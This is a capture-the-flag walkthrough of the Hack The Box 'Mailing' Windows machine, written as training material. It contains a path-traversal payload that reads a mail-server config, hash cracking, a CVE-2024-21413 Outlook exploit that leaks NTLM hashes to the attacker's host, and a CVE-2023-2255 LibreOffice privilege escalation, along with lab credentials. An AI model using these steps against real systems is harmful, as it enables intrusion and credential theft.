HTB Mailing done
Mailing
OS:
Windows
Technology:
IP Address:
10.10.11.14
Open ports:
25/tcp open smtp hMailServer smtpd
80/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
993/tcp open ssl/imap hMailServer imapd
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59524/tcp open msrpc Microsoft Windows RPC
Users and pass:
Creds for config mail client
L: user
P: password
---
From config file: C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
841bb5acfa6779ae432fd7a4e6600ba7
---
After decode hash
H: 841bb5acfa6779ae432fd7a4e6600ba7
P: homenetworkingadministrator
---
After cracking NTLM hash
L: maya
P: m4y4ngs4ri
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.14_nmap 10.10.11.14 ; cat 10.10.11.14_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 22:22 UTC
Nmap scan report for mailing.htb (10.10.11.14)
Host is up (0.050s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Mailing
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 NAMESPACE IMAP4rev1 CAPABILITY RIGHTS=texkA0001 CHILDREN completed OK IDLE QUOTA SORT ACL
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: IMAP4 NAMESPACE IMAP4rev1 CAPABILITY RIGHTS=texkA0001 CHILDREN completed OK IDLE QUOTA SORT ACL
|_ssl-date: TLS randomness does not represent time
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59524/tcp open msrpc Microsoft Windows RPC
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ cat /etc/hosts | grep mailing
10.10.11.14 mailing.htb
Ffuz - http://mailing.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ ffuf -u http://mailing.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o mailing.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://mailing.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : mailing.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Download.php [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 54ms]
Index.php [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 38ms]
assets [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 39ms]
[INFO] Adding a new job to the queue: http://mailing.htb/assets/FUZZ
download.php [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 40ms]
index.php [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 126ms]
instructions [Status: 301, Size: 166, Words: 9, Lines: 2, Duration: 48ms]
[INFO] Adding a new job to the queue: http://mailing.htb/instructions/FUZZ
[INFO] Starting queued job on target: http://mailing.htb/assets/FUZZ
[INFO] Starting queued job on target: http://mailing.htb/instructions/FUZZ
:: Progress: [122814/122814] :: Job [3/3] :: 995 req/sec :: Duration: [0:02:09] :: Errors: 0 ::
Open website: http://mailing.htb/download.php
http://mailing.htb/download.php
___
I got message:
No file specified for download.
Ffuf - http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc
Find a parametr: file
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ ffuf -u "http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc" -c -w /usr/share/wordlists/dirb/big.txt | grep -v "31"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
file [Status: 200, Size: 15, Words: 3, Lines: 1, Duration: 49ms]
:: Progress: [20469/20469] :: Job [1/1] :: 1092 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
Read config file of hMailServer: hMailServer.ini
Found password for administrator
841bb5acfa6779ae432fd7a4e6600ba7
Payload: ../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini
---
Request Burp
__
GET /download.php?file=../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini HTTP/1.1
Host: mailing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
---
Response Burp
__
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.ini"
X-Powered-By: ASP.NET
Date: Tue, 20 Aug 2024 23:40:35 GMT
Content-Length: 604
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
Decode hash
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 841bb5acfa6779ae432fd7a4e6600ba7
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
..
..
..
---
Decode hash on the website: https://crackstation.net/
H: 841bb5acfa6779ae432fd7a4e6600ba7
P: homenetworkingadministrator
Exploit: CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
[CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
Cloning into 'CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (28/28), 14.48 KiB | 593.00 KiB/s, done.
Resolving deltas: 100% (7/7), done.
Start Responder
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
...
...
...
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.25]
Responder IPv6 [dead:beef:2::1017]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-D2MI06F2IRI]
Responder Domain Name [APBU.LOCAL]
Responder DCE-RPC Port [47599]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:58f043bfa643c970:036A8339B8855432ADF03382471C7776:01010000000000000014D749A0F3DA01DCC94850E8F21F5D0000000002000800410050004200550001001E00570049004E002D00440032004D004900300036004600320049005200490004003400570049004E002D00440032004D00490030003600460032004900520049002E0041005000420055002E004C004F00430041004C000300140041005000420055002E004C004F00430041004C000500140041005000420055002E004C004F00430041004C00070008000014D749A0F3DA010600040002000000080030003000000000000000000000000020000078003ED9801FD4E17278EBF23CCDF37D9F21ECBF4465615B80AF8328B41B60730A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320035000000000000000000
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.25\aaa\meeting" --subject "qwerty"
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]
✅ Email sent successfully.
Cracking NTLM hash - user maya
After cracking NTLM hash
L: maya
P: m4y4ngs4ri
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ nano maya.ntlm.hash
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ john maya.ntlm.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri (maya)
1g 0:00:00:02 DONE (2024-08-21 13:13) 0.3861g/s 2290Kp/s 2290Kc/s 2290KC/s m61403..m4893019
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Login as user maya
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd ../Desktop
Read flag: user.txt
*Evil-WinRM* PS C:\Users\maya\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> dir
Directory: C:\Users\maya\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2024 7:34 PM 2350 Microsoft Edge.lnk
-ar--- 8/21/2024 9:53 AM 34 user.txt
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
b8309d454b9cfa67ea1a71e701f23708
*Evil-WinRM* PS C:\Users\maya\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
*Evil-WinRM* PS C:\Users\maya\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1d4
IPv6 Address. . . . . . . . . . . : dead:beef::8a58:ed5f:be4d:9fa5
Temporary IPv6 Address. . . . . . : dead:beef::f03e:1f9d:615:6448
Link-local IPv6 Address . . . . . : fe80::2c8e:d7b6:324b:9a84%14
IPv4 Address. . . . . . . . . . . : 10.10.11.14
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%14
10.10.10.2
*Evil-WinRM* PS C:\Users\maya\Desktop>
Privilege Escalation
Find vuln application - LibreOffice
I found LibreOffice version 7.4
---
*Evil-WinRM* PS C:\Users\maya\Documents> type "C:\PRogram Files\LibreOffice\readmes\readme_en-GB.txt"
======================================================================
LibreOffice 7.4 ReadMe
======================================================================
For the latest updates to this readme file, see https://git.libreoffice.org/core/tree/master/README.md
This file contains important information about the LibreOffice software. You are recommended to read this information very carefully before starting installation.
Exploit: CVE-2023-2255 Remote documents loaded without prompt via IFrame
[CVE-2023-2255 Remote documents loaded without prompt via IFramev](https://github.com/elweth-sec/CVE-2023-2255v)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
Resolving deltas: 100% (2/2), done.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ cd CVE-2023-2255
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ ls
CVE-2023-2255.py README.md samples webshell.php
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exploit.odt
File exploit.odt has been created !
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ cp exploit.odt ../
---
*Evil-WinRM* PS C:\Users\maya\Documents> upload /home/kali/Desktop/oscp/writeups/HTB/HTB_Mailing/exploit.odt
Info: Uploading /home/kali/Desktop/oscp/writeups/HTB/HTB_Mailing/exploit.odt to C:\Users\maya\Documents\exploit.odt
Data: 40700 bytes of 40700 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\maya\Documents>
*Evil-WinRM* PS C:\Users\maya\Documents> ./exploit.odt
*Evil-WinRM* PS C:\Users\maya\Documents>
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================================ ================ ============ ===============================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local y miembro del grupo de administradores Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administradores Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio alto Label S-1-16-12288
*Evil-WinRM* PS C:\Users\maya\Documents>
Read flag: root.txt
*Evil-WinRM* PS C:\Users\maya\Documents> dir
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 8/22/2024 11:34 PM 30526 exploit.odt
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs
*Evil-WinRM* PS C:\Users\maya\Documents> type C:\Users\localadmin\Desktop\root.txt
230a9ca959433d45dddd6d48238732ee
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================================ ================ ============ ===============================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local y miembro del grupo de administradores Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administradores Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio alto Label S-1-16-12288
*Evil-WinRM* PS C:\Users\maya\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1d4
IPv6 Address. . . . . . . . . . . : dead:beef::ba80:a172:f0c9:8779
Temporary IPv6 Address. . . . . . : dead:beef::edbd:c7b4:ad5e:d70c
Link-local IPv6 Address . . . . . : fe80::b30a:816b:ad8:5c77%14
IPv4 Address. . . . . . . . . . . : 10.10.11.14
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%14
10.10.10.2
*Evil-WinRM* PS C:\Users\maya\Documents>
References
[CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
[CVE-2023-2255 Remote documents loaded without prompt via IFramev](https://github.com/elweth-sec/CVE-2023-2255v)
Lessons Learned